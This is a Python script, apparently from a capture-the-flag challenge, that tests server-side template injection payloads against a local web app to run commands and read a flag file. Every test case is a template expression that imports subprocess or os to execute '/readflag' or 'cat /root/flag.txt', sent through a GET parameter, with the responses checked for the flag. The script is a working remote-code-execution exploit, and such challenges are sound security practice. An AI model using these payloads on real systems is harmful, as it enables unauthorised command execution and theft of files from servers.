#!/usr/bin/env python3
"""
Debug why /readflag output isn't captured
"""

import requests
import urllib3
urllib3.disable_warnings()

BASE_URL = "https://localhost:5000"

test_cases = [
    ("Direct readflag", "{{=__import__('subprocess').check_output(['/readflag'], text=True)}}"),
    ("With stderr", "{{=__import__('subprocess').check_output(['/readflag'], stderr=__import__('subprocess').STDOUT, text=True)}}"),
    ("With shell", "{{=__import__('subprocess').check_output('/readflag', shell=True, text=True)}}"),
    ("Popen", "{{=__import__('subprocess').Popen(['/readflag'], stdout=-1, text=True).communicate()[0]}}"),
    ("os.popen", "{{=__import__('os').popen('/readflag').read()}}"),
    ("Test cat flag", "{{=__import__('subprocess').check_output(['cat', '/root/flag.txt'], text=True)}}"),
]

for name, payload in test_cases:
    print(f"\n[>] Test: {name}")
    print(f"    Payload: {payload[:70]}...")
    
    r = requests.get(
        BASE_URL + "/welcome/default/index",
        params={"test": payload},
        verify=False
    )
    
    print(f"    Status: {r.status_code}, Length: {len(r.text)}")
    
    # Check for flag
    if "fake_flag" in r.text.lower() or "uoftctf" in r.text.lower():
        print(f"    [!!!] FLAG FOUND!")
        idx = r.text.lower().find("uoftctf")
        if idx == -1:
            idx = r.text.lower().find("fake_flag")
        print(f"    Context: {r.text[max(0,idx-100):idx+200]}")
        break
    
    # Check for error messages
    if "permission denied" in r.text.lower():
        print("    [!] Permission denied")
    if "error" in r.text.lower() and "ajax_error" not in r.text.lower():
        print("    [!] Some error occurred")